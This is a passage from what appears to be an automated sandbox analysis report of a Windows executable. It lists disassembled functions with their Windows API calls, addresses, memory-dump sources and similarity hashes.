GetProcAddress.KERNEL32(00000000), ref: 00E441EA
EncodePointer.KERNEL32(00000000), ref: 00E441F6
DecodePointer.KERNEL32(00000001,00E44292,?), ref: 00E44213

Strings

RoInitialize, xrefs: 00E441D2
combase.dll, xrefs: 00E441DE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 6c3d5f6b955f7d99cb48d119ea6871f2255f17a1e1443a2360de9deb7c72d3bd
Instruction ID: c4e4a4a2e29a34a52d42ed8f56f9040cd97f70b3b5be7e858c501c6a3a414ee1
Opcode Fuzzy Hash: 6c3d5f6b955f7d99cb48d119ea6871f2255f17a1e1443a2360de9deb7c72d3bd
Instruction Fuzzy Hash: F1E0EDF0A91344AEDF206BB2EC49B453594AB65707F105424F551F90E0DBB5509D9A04

Function 00E4429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E441B8), ref: 00E442B8
GetProcAddress.KERNEL32(00000000), ref: 00E442BF
EncodePointer.KERNEL32(00000000), ref: 00E442CA
DecodePointer.KERNEL32(00E441B8), ref: 00E442E5

Strings

RoUninitialize, xrefs: 00E442A7
combase.dll, xrefs: 00E442B3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 47db4fdbe21ea54cdb6dafbfa3d3c0377ca22e8c4942227a812f0cfb00b8357e
Instruction ID: a5b463c9b19254f898d8f076e246971d66a7a81c4ddfef6d4337ec402f1a6307
Opcode Fuzzy Hash: 47db4fdbe21ea54cdb6dafbfa3d3c0377ca22e8c4942227a812f0cfb00b8357e
Instruction Fuzzy Hash: DFE092B8682344AFEF10ABA2FC49B453AA4BB29B46F105428F141F90F0CBB4954C9A18

Function 00E8675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E868AD
_memmove.LIBCMT ref: 00E867E8

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

_memmove.LIBCMT ref: 00E8685B
_memmove.LIBCMT ref: 00E86942
_memmove.LIBCMT ref: 00E8695B
_memmove.LIBCMT ref: 00E86977

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 6aa6e80b9c2606e167b2da2199f3895ce101c05c4367c233dd0d0763cc817869
Instruction ID: 2e14432239239e9aa772e5f1b89fed062146fd83e55c80882b37ab68dd35c858
Opcode Fuzzy Hash: 6aa6e80b9c2606e167b2da2199f3895ce101c05c4367c233dd0d0763cc817869
Instruction Fuzzy Hash: B3619A3050066A9BDF15FF24D882EFE37E4AF88308F046559F85D7B292DB31A945CB90

Function 00EA046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00EA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA0038,?,?), ref: 00EA10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EA05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EA05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EA0617
RegCloseKey.ADVAPI32(00000000), ref: 00EA0624

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 4863df62523287de2ad0a6d44506ae739bb0c6b7c90b6fa54d6718b1644505b8
Instruction ID: a4a835d6449c3b5d0e022395a068a9666a9625dccccbbba0e7d5fddd9e926b9f
Opcode Fuzzy Hash: 4863df62523287de2ad0a6d44506ae739bb0c6b7c90b6fa54d6718b1644505b8
Instruction Fuzzy Hash: 1A515B31608200AFDB14EF64D885E6FBBE9FF89314F04595DF585AB2A1DB31E904CB52

Function 00EA5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00EA5A82
GetMenuItemCount.USER32(00000000), ref: 00EA5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EA5AE1
GetMenuItemID.USER32(?,?), ref: 00EA5B50
GetSubMenu.USER32(?,?), ref: 00EA5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00EA5BAF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 9d23e416f8952c77fc3e32ee38efb8e70e2cd9f8d9454e2ff773465f50031194
Instruction ID: cfd5c1c9d1c6ff7c588c85df024a68f789f89260b9d8ea57931d7f4d82fe0477
Opcode Fuzzy Hash: 9d23e416f8952c77fc3e32ee38efb8e70e2cd9f8d9454e2ff773465f50031194
Instruction Fuzzy Hash: BC516D36A00625EFCB15EFA4D845AAEB7F4EF4D320F105469F916BB251CB70BE418B90

Function 00E7F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E7F3F7
VariantClear.OLEAUT32(00000013), ref: 00E7F469
VariantClear.OLEAUT32(00000000), ref: 00E7F4C4
_memmove.LIBCMT ref: 00E7F4EE
VariantClear.OLEAUT32(?), ref: 00E7F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E7F569

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 0d711ea9a6d883fa39169129e104d39d02f517efe3cabaed6be0ac92c28a2862
Instruction ID: 13dca747e5a8f14ae41015d971c9d3cc749ad97792754eeea5f60595651306b5
Opcode Fuzzy Hash: 0d711ea9a6d883fa39169129e104d39d02f517efe3cabaed6be0ac92c28a2862
Instruction Fuzzy Hash: DF5148B5A00209EFCB14CF58D884AAAB7F8FF4D354B158569E959EB310E730E951CBA0

Function 00E826F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E82792
IsMenu.USER32(00000000), ref: 00E827B2
CreatePopupMenu.USER32 ref: 00E827E6
GetMenuItemCount.USER32(000000FF), ref: 00E82844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E82875

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: c45d90bbf86e9ea2c2f210225e3f9422c39ceac18b4bbc12496f7606b768a96e
Instruction ID: e8f8018e0b861bd96fc426fb6624358acef247655368d5b28421681443004ee4
Opcode Fuzzy Hash: c45d90bbf86e9ea2c2f210225e3f9422c39ceac18b4bbc12496f7606b768a96e
Instruction Fuzzy Hash: B151A070A00205EFDF28EF69D888AADBBF4EF45318F10516DEA1DBB290D7709904CB51

Function 00E21765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00E2179A
GetWindowRect.USER32(?,?), ref: 00E217FE
ScreenToClient.USER32(?,?), ref: 00E2181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E2182C
EndPaint.USER32(?,?), ref: 00E21876

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 6fff21df934c1d962b2c248e3ea8b58862385d0b54a86694e3d6be515eb8a9ca
Instruction ID: e3491654e0193496d1bc597355abf7e907692e59289247550f3a73e60fe6d458
Opcode Fuzzy Hash: 6fff21df934c1d962b2c248e3ea8b58862385d0b54a86694e3d6be515eb8a9ca
Instruction Fuzzy Hash: 6841C230100354AFC714DF25ECC4FBA7BE8EB6A764F140669F994AB1A2C730A909DB61

Function 00EAB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00EE67B0,00000000,009E5EA0,?,?,00EE67B0,?,00EAB862,?,?), ref: 00EAB9CC
EnableWindow.USER32(00000000,00000000), ref: 00EAB9F0
ShowWindow.USER32(00EE67B0,00000000,009E5EA0,?,?,00EE67B0,?,00EAB862,?,?), ref: 00EABA50
ShowWindow.USER32(00000000,00000004,?,00EAB862,?,?), ref: 00EABA62
EnableWindow.USER32(00000000,00000001), ref: 00EABA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EABAA9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 28594860418c87cf81e11030b59bc2de8e7567c144181cce4a06e7801b0354b7
Instruction ID: 425c7ae4ba8c869fa50863833b9a58ca17fdd024d9518268900a59fb6f66d8f8
Opcode Fuzzy Hash: 28594860418c87cf81e11030b59bc2de8e7567c144181cce4a06e7801b0354b7
Instruction Fuzzy Hash: 79415E31600241AFDB22CF65C489B957BE0BB4E318F1852B9FA58AF6A3C731F845CB51

Function 00E973B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00E95134,?,?,00000000,00000001), ref: 00E973BF

Part of subcall function 00E93C94: GetWindowRect.USER32(?,?), ref: 00E93CA7

GetDesktopWindow.USER32 ref: 00E973E9
GetWindowRect.USER32(00000000), ref: 00E973F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E97422

Part of subcall function 00E854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E8555E

GetCursorPos.USER32(?), ref: 00E9744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E974AC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 3e760cc149ac3ea0bc73ed8209a91514eef30ab8267d52b0e8d418ec08623f29
Instruction ID: 41b27bfa9f67a8562c76c02644d5addb3304732fbe919ee9d869b43a27d7955f
Opcode Fuzzy Hash: 3e760cc149ac3ea0bc73ed8209a91514eef30ab8267d52b0e8d418ec08623f29
Instruction Fuzzy Hash: 3231E672508305AFDB24DF54D849F9BBBE9FF89314F001919F999A7191CB30E908CB92

Function 00E78D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E785F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E78608
Part of subcall function 00E785F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E78612
Part of subcall function 00E785F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E78621
Part of subcall function 00E785F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E78628
Part of subcall function 00E785F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E7863E

GetLengthSid.ADVAPI32(?,00000000,00E78977), ref: 00E78DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E78DB8
HeapAlloc.KERNEL32(00000000), ref: 00E78DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00E78DD8
GetProcessHeap.KERNEL32(00000000,00000000,00E78977), ref: 00E78DEC
HeapFree.KERNEL32(00000000), ref: 00E78DF3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 8e8dcc1c5986cd3cdaa2e5730d5bc4738af2b76a1265b897681e07eed33d091c
Instruction ID: cbfa1f346c8ffcdd2654be156bf793e00977aa64f820a83465a1a603f46d8cd4
Opcode Fuzzy Hash: 8e8dcc1c5986cd3cdaa2e5730d5bc4738af2b76a1265b897681e07eed33d091c
Instruction Fuzzy Hash: 3C11E131A41605FFDB208FA5CD0CBAE77ADEF65319F108129E949B3251CB31AD04CB60

Function 00E78AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E78B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00E78B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E78B40
CloseHandle.KERNEL32(00000004), ref: 00E78B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E78B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00E78B8E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 207eeb561e5732fd5d33d26b81e2dd9b5b8fcfad3933d4cc006a08ccecbc3c28
Instruction ID: 149c66a857e980311f0d74bcddb2de3a7f5a2988d03450bbd72e78fe0bad0cee
Opcode Fuzzy Hash: 207eeb561e5732fd5d33d26b81e2dd9b5b8fcfad3933d4cc006a08ccecbc3c28
Instruction Fuzzy Hash: 931159B6540209AFDF018FA5ED49FDA7BA9EF09309F049065FE08B2160C7729D64EB60

Function 00EAC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00E212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E2134D
Part of subcall function 00E212F3: SelectObject.GDI32(?,00000000), ref: 00E2135C
Part of subcall function 00E212F3: BeginPath.GDI32(?), ref: 00E21373
Part of subcall function 00E212F3: SelectObject.GDI32(?,00000000), ref: 00E2139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EAC1C4
LineTo.GDI32(00000000,00000003,?), ref: 00EAC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EAC1E6
LineTo.GDI32(00000000,00000000,?), ref: 00EAC1F6
EndPath.GDI32(00000000), ref: 00EAC206
StrokePath.GDI32(00000000), ref: 00EAC216

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d094f28fa68b9ac0480eb2d84876ae51dd70221444fd1c0358e6b4b4316d0aff
Instruction ID: ace8aad1ca0a26298e0c8501e57d278e145ea51f1caa7598e9f924a20e5584f1
Opcode Fuzzy Hash: d094f28fa68b9ac0480eb2d84876ae51dd70221444fd1c0358e6b4b4316d0aff
Instruction Fuzzy Hash: 6911397600014CBFDB119F91EC88FAA3FACEB09394F008021FA086A161C771AE59DBA0

Function 00E403A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E403D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00E403DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E403E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E403F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00E403F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E40401

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9cba02d5519275e9b5c61b4108ff1273b52c4013850a82d1e56265987cbe97ca
Instruction ID: 97f4c0f29036691deddcb55e61f30db3f0e275eeec0c3b268970452838e1f7ee
Opcode Fuzzy Hash: 9cba02d5519275e9b5c61b4108ff1273b52c4013850a82d1e56265987cbe97ca
Instruction Fuzzy Hash: 25016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BE15C47941C7F5A868CBE5

Function 00E8568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E8569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E856B1
GetWindowThreadProcessId.USER32(?,?), ref: 00E856C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E856CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E856D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E856E0

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 838f2d1d24ef935e91674b9de608c926a4bbc051efccd5b2ba0eb9fd99dc4ace
Instruction ID: d88efe47b74fca04e34b8f2ff4a83f338c90f1ba4fa52730c06a61bbc1b045e9
Opcode Fuzzy Hash: 838f2d1d24ef935e91674b9de608c926a4bbc051efccd5b2ba0eb9fd99dc4ace
Instruction Fuzzy Hash: B2F01D32641558BFE7215BE3DC0DEAB7A7CEBCBB11F000169FA05E10519AA16A0586B5

Function 00E874D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00E874E5
EnterCriticalSection.KERNEL32(?,?,00E31044,?,?), ref: 00E874F6
TerminateThread.KERNEL32(00000000,000001F6,?,00E31044,?,?), ref: 00E87503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E31044,?,?), ref: 00E87510

Part of subcall function 00E86ED7: CloseHandle.KERNEL32(00000000,?,00E8751D,?,00E31044,?,?), ref: 00E86EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00E87523
LeaveCriticalSection.KERNEL32(?,?,00E31044,?,?), ref: 00E8752A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
